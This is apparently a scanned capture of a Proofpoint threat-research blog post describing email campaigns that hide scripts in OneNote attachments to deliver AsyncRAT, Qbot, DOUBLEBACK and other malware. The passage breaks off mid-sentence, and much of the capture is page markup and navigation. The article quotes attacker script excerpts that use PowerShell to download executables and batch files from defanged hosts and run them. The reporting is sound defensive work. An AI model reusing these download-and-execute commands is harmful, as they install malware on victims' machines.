www.proofpoint.com
Open in
urlscan Pro
2a02:e980:107::cf
Public Scan
URL:
https://www.proofpoint.com/us/blog/threat-insight/onenote-documents-increasingly-used-to-deliver-malware
Submission: On February 20 via api from US — Scanned from DE
Submission: On February 20 via api from US — Scanned from DE
Form analysis 3 forms found in the DOM
/us
<form action="/us" data-region="us" data-language="en">
<input type="text" name="search_block_form" placeholder="Search">
<input type="submit">
</form><form id="mktoForm_10895" data-mkto-id="10895" data-mkto-base="//app-abj.marketo.com" data-munchkin-id="309-RHV-619" data-submit-text="" data-redirect-link="" data-prefill="" data-event-label=""
class="mk-form__form marketo-form-block__form mktoForm mktoHasWidth mktoLayoutLeft js-visible mkto-form-processed" novalidate="novalidate" style="font-family: inherit; font-size: 16px; color: rgb(51, 51, 51); width: 1601px;">
<style type="text/css"></style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 150px;">
<div class="mktoAsterix">*</div>Business Email:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" placeholder="Business Email *" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 200px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoFieldWrap mk-form__checkbox-field">
<div class="blog-subscribe__select-box">Select</div><label for="blogInterest" id="LblblogInterest" class="mktoLabel mktoHasWidth mk-form__checkbox-label" style="width: 150px;">
<div class="mktoAsterix">*</div>Blog Interest:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div>
<div class="mktoLogicalField mktoCheckboxList mktoHasWidth" style="width: 200px;"><input name="blogInterest" id="mktoCheckbox_185044_0" type="checkbox" value="All"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_0 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_0" id="LblmktoCheckbox_185044_0">All</label><input name="blogInterest" id="mktoCheckbox_185044_1" type="checkbox" value="Archiving and Compliance"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_1 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_1" id="LblmktoCheckbox_185044_1">Archiving and Compliance</label><input name="blogInterest" id="mktoCheckbox_185044_2" type="checkbox" value="CISO Perspectives"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_2 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_2" id="LblmktoCheckbox_185044_2">CISO Perspectives</label><input name="blogInterest" id="mktoCheckbox_185044_3" type="checkbox" value="Cloud Security"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_3 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_3" id="LblmktoCheckbox_185044_3">Cloud Security</label><input name="blogInterest" id="mktoCheckbox_185044_4" type="checkbox" value="Corporate News"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_4 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_4" id="LblmktoCheckbox_185044_4">Corporate News</label><input name="blogInterest" id="mktoCheckbox_185044_5" type="checkbox" value="Email and Cloud Threats"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_5 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_5" id="LblmktoCheckbox_185044_5">Email and Cloud Threats</label><input name="blogInterest" id="mktoCheckbox_185044_6" type="checkbox" value="Engineering Insights"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_6 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_6" id="LblmktoCheckbox_185044_6">Engineering Insights</label><input name="blogInterest" id="mktoCheckbox_185044_7" type="checkbox" value="Information Protection"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_7 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_7" id="LblmktoCheckbox_185044_7">Information Protection</label><input name="blogInterest" id="mktoCheckbox_185044_8" type="checkbox" value="Insider Threat Management"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_8 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_8" id="LblmktoCheckbox_185044_8">Insider Threat Management</label><input name="blogInterest" id="mktoCheckbox_185044_9" type="checkbox" value="Remote Workforce Protection"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_9 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_9" id="LblmktoCheckbox_185044_9">Remote Workforce Protection</label><input name="blogInterest" id="mktoCheckbox_185044_10" type="checkbox" value="Security Awareness Training"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_10 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_10" id="LblmktoCheckbox_185044_10">Security Awareness Training</label><input name="blogInterest" id="mktoCheckbox_185044_11" type="checkbox" value="Security Briefs"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_11 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_11" id="LblmktoCheckbox_185044_11">Security Briefs</label><input name="blogInterest" id="mktoCheckbox_185044_12" type="checkbox" value="Threat Insight"
aria-labelledby="LblblogInterest LblmktoCheckbox_185044_12 InstructblogInterest" class="mktoField"
placeholder="AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight"><label
for="mktoCheckbox_185044_12" id="LblmktoCheckbox_185044_12">Threat Insight</label></div><span id="InstructblogInterest" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Employees_Picklist__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="State" class="mktoField mktoFieldDescriptor mktoFormCol" value="State/Province" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="Website" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium_Detail__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="www-pfpt" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Industry" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Website" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="AnnualRevenue" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandbasesid" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandBase_Data_Source" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Primary_Product_Interest__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_Post_ID__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmcampaign" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmterm" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="db_employee_count" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Unsubscribed" class="mktoField mktoFieldDescriptor mktoFormCol" value="0" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Submit</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="10895" placeholder=""><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="309-RHV-619" placeholder=""><input type="hidden" name="Website_Conversion_URL__c" class="mktoField mktoFieldDescriptor"
value="https://www.proofpoint.com/us/blog/threat-insight/onenote-documents-increasingly-used-to-deliver-malware"><input type="hidden" name="gAClientID" class="mktoField mktoFieldDescriptor" value="1604983294.1676916884">
</form><form data-mkto-id="10895" data-mkto-base="//app-abj.marketo.com" data-munchkin-id="309-RHV-619" data-submit-text="" data-redirect-link="" data-prefill="" data-event-label=""
class="mk-form__form marketo-form-block__form mktoForm mktoHasWidth mktoLayoutLeft" novalidate="novalidate"
style="font-family: inherit; font-size: 16px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"></form>Text Content
Skip to main content Products Solutions Partners Resources Company ContactLanguages Support Log-in Digital Risk Portal Email Fraud Defense ET Intelligence Proofpoint Essentials Sendmail Support Log-in Main Menu AEGIS THREAT PROTECTION PLATFORM Disarm BEC, phishing, ransomware, supply chain threats and more. SIGMA INFORMATION PROTECTION PLATFORM Defend your data from careless, compromised and malicious users. INTELLIGENT COMPLIANCE PLATFORM Reduce risk, control costs and improve data visibility to ensure compliance. PREMIUM SECURITY SERVICES Get deeper insight with on-call, personalized assistance from our expert team. NEW THREAT PROTECTION SOLUTION BUNDLES WITH FLEXIBLE DEPLOYMENT OPTIONS AI-powered protection against BEC, ransomware, phishing, supplier risk and more with inline+API or MX-based deployment Learn More SOLUTIONS BY TOPIC COMBAT EMAIL AND CLOUD THREATS Protect your people from email and cloud threats with an intelligent and holistic approach. CHANGE USER BEHAVIOR Help your employees identify, resist and report attacks before the damage is done. COMBAT DATA LOSS AND INSIDER RISK Prevent data loss via negligent, compromised and malicious insiders by correlating content, behavior and threats. MODERNIZE COMPLIANCE AND ARCHIVING Manage risk and data retention needs with a modern compliance and archiving solution. PROTECT CLOUD APPS Keep your people and their cloud apps secure by eliminating threats, avoiding data loss and mitigating compliance risk. PREVENT LOSS FROM RANSOMWARE Learn about this growing threat and stop attacks by securing today’s top ransomware vector: email. SECURE MICROSOFT 365 Implement the very best security and compliance solution for your Microsoft 365 collaboration suite. DEFEND YOUR REMOTE WORKFORCE WITH CLOUD EDGE Secure access to corporate resources and ensure business continuity for your remote workers. WHY PROOFPOINT Today’s cyber attacks target people. Learn about our unique people-centric approach to protection. SOLUTIONS BY INDUSTRY Federal Government State and Local Government Higher Education Financial Services Healthcare Mobile Operators Internet Service Providers Small and Medium Businesses PARTNER PROGRAMS CHANNEL PARTNERS Become a channel partner. Deliver Proofpoint solutions to your customers and grow your business. ARCHIVE EXTRACTION PARTNERS Learn about the benefits of becoming a Proofpoint Extraction Partner. GLOBAL SYSTEM INTEGRATOR (GSI) AND MANAGED SERVICE PROVIDER (MSP) PARTNERS Learn about our global consulting and services partners that deliver fully managed and integrated solutions. TECHNOLOGY AND ALLIANCE PARTNERS Learn about our relationships with industry-leading firms to help protect your people, data and brand. SOCIAL MEDIA PROTECTION PARTNERS Learn about the technology and alliance partners in our Social Media Protection Partner program. PROOFPOINT ESSENTIALS PARTNER PROGRAMS Small Business Solutions for channel partners and MSPs. PARTNER TOOLS Become a Channel Partner Channel Partner Portal RESOURCE LIBRARY Find the information you're looking for in our library of videos, data sheets, white papers and more. BLOG Keep up with the latest news and happenings in the ever‑evolving cybersecurity landscape. PODCASTS Learn about the human side of cybersecurity. Episodes feature insights from experts and executives. NEW PERIMETERS MAGAZINE Get the latest cybersecurity insights in your hands – featuring valuable knowledge from our own industry experts. THREAT GLOSSARY Learn about the latest security threats and how to protect your people, data, and brand. EVENTS Connect with us at events to learn how to protect your people and data from ever‑evolving threats. CUSTOMER STORIES Read how Proofpoint customers around the globe solve their most pressing cybersecurity challenges. WEBINARS Browse our webinar library to learn about the latest threats, trends and issues in cybersecurity. Watch now to earn your CPE credits SECURITY HUBS Get free research and resources to help you protect against threats, build a security culture, and stop ransomware in its tracks. Threat Hub CISO Hub Cybersecurity Awareness Hub Ransomware Hub Insider Threat Management Hub ABOUT PROOFPOINT Proofpoint is a leading cybersecurity company that protects organizations' greatest assets and biggest risks: their people. WHY PROOFPOINT Today’s cyber attacks target people. Learn about our unique people-centric approach to protection. CAREERS Stand out and make a difference at one of the world's leading cybersecurity companies. NEWS CENTER Read the latest press releases, news stories and media highlights about Proofpoint. PRIVACY AND TRUST Learn about how we handle data and make commitments to privacy and other regulations. ENVIRONMENTAL, SOCIAL, AND GOVERNANCE Learn about our people-centric principles and how we implement them to positively impact our global community. SUPPORT Access the full range of Proofpoint support services. Learn More English (Americas) English (Europe, Middle East, Africa) English (Asia-Pacific) Español Deutsch Français Italiano Português 日本語 한국어 Products Overview EMAIL SECURITY AND PROTECTION Email Protection Email Fraud Defense Secure Email Relay Threat Response Auto-Pull Sendmail Open Source Essentials for Small Business ADVANCED THREAT PROTECTION Targeted Attack Protection in Email Email Isolation Threat Response Emerging Threats Intelligence SECURITY AWARENESS TRAINING Assess Change Behavior Evaluate Overview INFORMATION PROTECTION Enterprise Data Loss Prevention (DLP) Insider Threat Management Intelligent Classification and Protection Endpoint Data Loss Prevention (DLP) Email Data Loss Prevention (DLP) Email Encryption Data Discover CLOUD SECURITY Browser Isolation Cloud Account Defense Cloud App Security Broker Web Security Overview COMPLIANCE AND ARCHIVING Automate Capture Patrol Track Archive Discover Supervision DIGITAL RISK PROTECTION Social Media Protection Domain Fraud Monitoring Executive and Location Threat Monitoring Overview PREMIUM SECURITY SERVICES Technical Account Managers Proofpoint Threat Information Services Managed Services for Security Awareness Training People-Centric Security Program Managed Email Security Managed Services for Information Protection Insider Threat Management Services Compliance and Archiving Services Consultative Services Products Solutions Partners Resources Company English (Americas) English (Europe, Middle East, Africa) English (Asia-Pacific) Español Deutsch Français Italiano Português 日本語 한국어 Login Support Log-in Digital Risk Portal Email Fraud Defense ET Intelligence Proofpoint Essentials Sendmail Support Log-in Contact AEGIS THREAT PROTECTION PLATFORM Disarm BEC, phishing, ransomware, supply chain threats and more. SIGMA INFORMATION PROTECTION PLATFORM Defend your data from careless, compromised and malicious users. INTELLIGENT COMPLIANCE PLATFORM Reduce risk, control costs and improve data visibility to ensure compliance. PREMIUM SECURITY SERVICES Get deeper insight with on-call, personalized assistance from our expert team. Overview EMAIL SECURITY AND PROTECTION Email Protection Email Fraud Defense Secure Email Relay Threat Response Auto-Pull Sendmail Open Source Essentials for Small Business ADVANCED THREAT PROTECTION Targeted Attack Protection in Email Email Isolation Threat Response Emerging Threats Intelligence SECURITY AWARENESS TRAINING Assess Change Behavior Evaluate Overview INFORMATION PROTECTION Enterprise Data Loss Prevention (DLP) Insider Threat Management Intelligent Classification and Protection Endpoint Data Loss Prevention (DLP) Email Data Loss Prevention (DLP) Email Encryption Data Discover CLOUD SECURITY Browser Isolation Cloud Account Defense Cloud App Security Broker Web Security Overview COMPLIANCE AND ARCHIVING Automate Capture Patrol Track Archive Discover Supervision DIGITAL RISK PROTECTION Social Media Protection Domain Fraud Monitoring Executive and Location Threat Monitoring Overview PREMIUM SECURITY SERVICES Technical Account Managers Proofpoint Threat Information Services Managed Services for Security Awareness Training People-Centric Security Program Managed Email Security Managed Services for Information Protection Insider Threat Management Services Compliance and Archiving Services Consultative Services NEW THREAT PROTECTION SOLUTION BUNDLES WITH FLEXIBLE DEPLOYMENT OPTIONS AI-powered protection against BEC, ransomware, phishing, supplier risk and more with inline+API or MX-based deployment Learn More SOLUTIONS BY TOPIC COMBAT EMAIL AND CLOUD THREATS Protect your people from email and cloud threats with an intelligent and holistic approach. CHANGE USER BEHAVIOR Help your employees identify, resist and report attacks before the damage is done. COMBAT DATA LOSS AND INSIDER RISK Prevent data loss via negligent, compromised and malicious insiders by correlating content, behavior and threats. MODERNIZE COMPLIANCE AND ARCHIVING Manage risk and data retention needs with a modern compliance and archiving solution. PROTECT CLOUD APPS Keep your people and their cloud apps secure by eliminating threats, avoiding data loss and mitigating compliance risk. PREVENT LOSS FROM RANSOMWARE Learn about this growing threat and stop attacks by securing today’s top ransomware vector: email. SECURE MICROSOFT 365 Implement the very best security and compliance solution for your Microsoft 365 collaboration suite. DEFEND YOUR REMOTE WORKFORCE WITH CLOUD EDGE Secure access to corporate resources and ensure business continuity for your remote workers. WHY PROOFPOINT Today’s cyber attacks target people. Learn about our unique people-centric approach to protection. SOLUTIONS BY INDUSTRY Federal Government State and Local Government Higher Education Financial Services Healthcare Mobile Operators Internet Service Providers Small and Medium Businesses PARTNER PROGRAMS CHANNEL PARTNERS Become a channel partner. Deliver Proofpoint solutions to your customers and grow your business. ARCHIVE EXTRACTION PARTNERS Learn about the benefits of becoming a Proofpoint Extraction Partner. GLOBAL SYSTEM INTEGRATOR (GSI) AND MANAGED SERVICE PROVIDER (MSP) PARTNERS Learn about our global consulting and services partners that deliver fully managed and integrated solutions. TECHNOLOGY AND ALLIANCE PARTNERS Learn about our relationships with industry-leading firms to help protect your people, data and brand. SOCIAL MEDIA PROTECTION PARTNERS Learn about the technology and alliance partners in our Social Media Protection Partner program. PROOFPOINT ESSENTIALS PARTNER PROGRAMS Small Business Solutions for channel partners and MSPs. PARTNER TOOLS Become a Channel Partner Channel Partner Portal RESOURCE LIBRARY Find the information you're looking for in our library of videos, data sheets, white papers and more. BLOG Keep up with the latest news and happenings in the ever‑evolving cybersecurity landscape. PODCASTS Learn about the human side of cybersecurity. Episodes feature insights from experts and executives. NEW PERIMETERS MAGAZINE Get the latest cybersecurity insights in your hands – featuring valuable knowledge from our own industry experts. THREAT GLOSSARY Learn about the latest security threats and how to protect your people, data, and brand. EVENTS Connect with us at events to learn how to protect your people and data from ever‑evolving threats. CUSTOMER STORIES Read how Proofpoint customers around the globe solve their most pressing cybersecurity challenges. WEBINARS Browse our webinar library to learn about the latest threats, trends and issues in cybersecurity. Watch now to earn your CPE credits SECURITY HUBS Get free research and resources to help you protect against threats, build a security culture, and stop ransomware in its tracks. Threat Hub CISO Hub Cybersecurity Awareness Hub Ransomware Hub Insider Threat Management Hub ABOUT PROOFPOINT Proofpoint is a leading cybersecurity company that protects organizations' greatest assets and biggest risks: their people. WHY PROOFPOINT Today’s cyber attacks target people. Learn about our unique people-centric approach to protection. CAREERS Stand out and make a difference at one of the world's leading cybersecurity companies. NEWS CENTER Read the latest press releases, news stories and media highlights about Proofpoint. PRIVACY AND TRUST Learn about how we handle data and make commitments to privacy and other regulations. ENVIRONMENTAL, SOCIAL, AND GOVERNANCE Learn about our people-centric principles and how we implement them to positively impact our global community. SUPPORT Access the full range of Proofpoint support services. Learn More Zeigen Sie weiterhin Inhalte für Ihren Standort an United StatesUnited KingdomFranceDeutschlandEspaña日本AustraliaItaliaFortsetzen Blog Threat Insight OneNote Documents Increasingly Used to Deliver Malware ONENOTE DOCUMENTS INCREASINGLY USED TO DELIVER MALWARE Share with your network! Facebook Twitter LinkedIn Email App February 01, 2023 Tommy Madjar, Corsin Camichel, Joe Wise, Selena Larson and Chris Talib KEY FINDINGS: * The use of Microsoft OneNote documents to deliver malware via email is increasing. * Multiple cybercriminal threat actors are using OneNote documents to deliver malware. * While some campaigns are targeted at specific industries, most are broadly targeted and include thousands of messages. * In order to detonate the payload, an end-user must interact with the OneNote document. * Campaigns have impacted organizations globally, including North America and Europe. * TA577 returned from a month-long hiatus in activity and began using OneNote to deliver Qbot at the end of January 2023. OVERVIEW Proofpoint researchers recently identified an increase in threat actor use of OneNote documents to deliver malware via email to unsuspecting end-users in December 2022 and January 2023. OneNote is a digital notebook created by Microsoft and available via the Microsoft 365 product suite. Proofpoint has observed threat actors deliver malware via OneNote documents, which are .one extensions, via email attachments and URLs. Proofpoint observed six campaigns in December 2022 using OneNote attachments to deliver AsyncRAT malware. In January 2023, Proofpoint observed over 50 OneNote campaigns delivering different malware payloads including AsyncRAT, Redline, AgentTesla, and DOUBLEBACK. Notably, the initial access broker TA577 began using OneNote documents to deliver Qbot at the end of January 2023. The campaigns included multiple senders and subjects, with different targeting and volume depending on the campaign. While we have seen an increase in the number of campaigns utilizing OneNote to deliver malware, its use is unusual. Based upon our observed characteristics of past threat campaigns, it is believed that threat actors have increasingly adopted OneNote as of result of their experimentation with different attachment types to bypass threat detection. Since Microsoft began blocking macros by default in 2022, threat actors have experimented with many new tactics, techniques, and procedures (TTPs), including use of previously infrequently observed filetypes such as virtual hard disk (VHD), compiled HTML (CHM), and now OneNote (.one). The technique may be effective for now. At the time of analysis, multiple OneNote malware samples observed by Proofpoint were not detected by numerous anti-virus vendors on VirusTotal. Proofpoint continues to assess these activity clusters and does not attribute them to a tracked threat actor. CAMPAIGN DETAILS Observed email campaigns that use OneNote for malware delivery share similar characteristics. While the message subjects and senders vary, nearly all campaigns use unique messages to deliver malware, and do not typically utilize thread hijacking. Messages typically contain OneNote file attachments with themes such as invoice, remittance, shipping, and seasonal themes such as Christmas bonus, among other subjects. In mid-January 2023, Proofpoint researchers observed actors using URLs to deliver OneNote attachments that use the same TTPs for malware execution. This includes a TA577 campaign observed on 31 January 2023. The OneNote documents contain embedded files, often hidden behind a graphic that looks like a button. When the user double clicks the embedded file, they will be prompted with a warning. If the user clicks continue, the file will execute. The file might be different kinds of executables, shortcut (LNK) files, or script files such as HTML application (HTA) or Windows script file (WSF). The number of campaigns using OneNote attachments increased significantly between December 2022 and 31 January 2023. Additionally, while Proofpoint only observed OneNote campaigns deliver AsyncRAT in December, researchers observed seven additional malware payloads distributed via OneNote attachments in January 2023: Redline, AgentTesla, Quasar RAT, XWorm, Netwire, DOUBLEBACK, and Qbot. Campaigns targeted organizations globally including in North America and Europe. Figure 1: Number of OneNote Campaigns in December 2022 through 31 January 2023, and total number of OneNote campaigns based on malware type. The observed increase in the total number of campaigns and diversity in payload type suggests multiple actors of various levels of sophistication are now using OneNote. While some clusters appear to be related based on command and control (C2), lures, and targeting, most campaigns use different infrastructure, message and lure themes, and targeting. Only one campaign was able to be attributed to a tracked actor, TA577. DECEMBER 2022 CAMPAIGNS Two December 2022 campaigns included senders purporting to be an aerospace entity and included attachment names related to machine parts and specifications. Messages contained a OneNote attachment containing an HTA file that calls a PowerShell script to download an executable (e.g., Excel.exe) from a URL. These messages targeted entities in manufacturing and industrial verticals. Figure 2: OneNote lure spoofing TP Aerospace. Excerpt of script: oShell.Run "cmd /c powershell Invoke-WebRequest -Uri hxxp[:]3.101.39[.]145/TPAEROSPACE.one -OutFile $env:tmp\kp.one; PowerShell Start-Process -Filepath $env:tmp\kp.one; Start-Sleep -Seconds 1 " & DontShowWindow, WaitUntilFinished oShell.Run "cmd /c powershell Invoke-WebRequest -Uri hxxp[:]3.101.39[.]145/Excel.exe -OutFile $env:tmp\system32.exe; PowerShell Start-Process -Filepath $env:tmp\system32.exe; Start-Sleep -Seconds 1 " & DontShowWindow, WaitUntilFinished Other campaigns leveraged invoice and shipping themes that included broad targeting and included thousands of messages, as well as “Christmas bonus” or “Christmas gift” lures that largely targeted organizations in the education sector among others. For example, one campaign, as illustrated below, spoofed a major consumer brand purporting to provide customers with a special gift. This campaign included thousands of messages largely targeting users in the education sector, among others. Figure 3: Christmas gift themed lures containing OneNote attachments to deliver AsyncRAT. These campaigns used the same TTPs as described above, delivering a OneNote attachment that used PowerShell to download the AsyncRAT payload from a URL. JANUARY 2023 CAMPAIGNS Proofpoint has observed over 50 campaigns leveraging OneNote attachments from 01 – 31 January 2023. These campaigns typically included thousands of messages and did not target specific organizations or verticals. The campaigns continued to use the same TTPs, with hidden embedded files in the OneNote attachment that ultimately lead to the download of a malware payload. In multiple campaigns, the actors used the legitimate services “OneNote Gem” and Transfer.sh to host payloads. On 19 January 2023, Proofpoint observed two campaigns using URLs to deliver OneNote attachments that led to XWorm and DOUBLEBACK payloads. Nearly all campaigns included themes related to shipping, invoices, taxes, or other generic business-related themes. After exclusively observing AsyncRAT payloads through December and early January, researchers observed QuasarRAT and XWorm malware campaigns on 09 January 2023 alongside AsyncRAT. Redline and AgentTesla were first observed on 11 January 2023, and Netwire first observed on 12 January 2023. Several of the OneNote documents investigated by Proofpoint researchers include a file history, indicating that the same threat actor is re-using a file and replaces the payload URLs to create a new file. While most campaigns are in English, researchers identified one campaign using invoice themes delivering XWorm and AsyncRAT that included both English and French languages in the lure. Messages contained a OneNote attachment containing a PowerShell script to download a batch file (system32.bat) from a URL. Figure 4: Malware campaign delivering XWorm and AsyncRAT payloads using invoice themes with messages in English and French. Excerpt of script: ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri hxxps[:]stnicholaschurch[.]ca/Invoice.one -OutFile $env:tmp\invoice.one; Start-Process -Filepath $env:tmp\invoice.one" ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri hxxps[:]stnicholaschurch[.]ca/Cardlock_341121.bat -OutFile $env:tmp\system32.bat; Start-Process -Filepath $env:tmp\system32.bat" Notably, on 19 January 2023, Proofpoint researchers observed a low-volume campaign distributing the DOUBLEBACK backdoor. DOUBLEBACK is an in-memory backdoor that can enable host and network reconnaissance, data theft, and follow-on payloads. DOUBLEBACK was previously used by TA579. This was the first observed OneNote campaign to use thread hijacking. Messages contained URLs on several domains with a URI ending with /download/[guid]. The actor purported to previously have contacted the victim and that the related files had been uploaded to cloud storage. The URL led to the download of a zip file (example 4752-23 Order Confirmation.zip) that contained a OneNote with the same name. Figure 5: DOUBLEBACK lure and OneNote attachment. When the OneNote was opened, the template advised the victim to "Double Click To View File". If the victim did this, OneNote would attempt to execute a VBS file (example JnNNj3.vbs) embedded behind the button. The victim would first be prompted about security risks about opening attachments. If the victim continued, the VBS would be fully executed. The VBS downloaded a PowerShell script to run DOUBLEBACK. Proofpoint has observed additional DOUBLEBACK campaigns using similar TTPs and does not attribute this campaign to a tracked threat actor. The initial 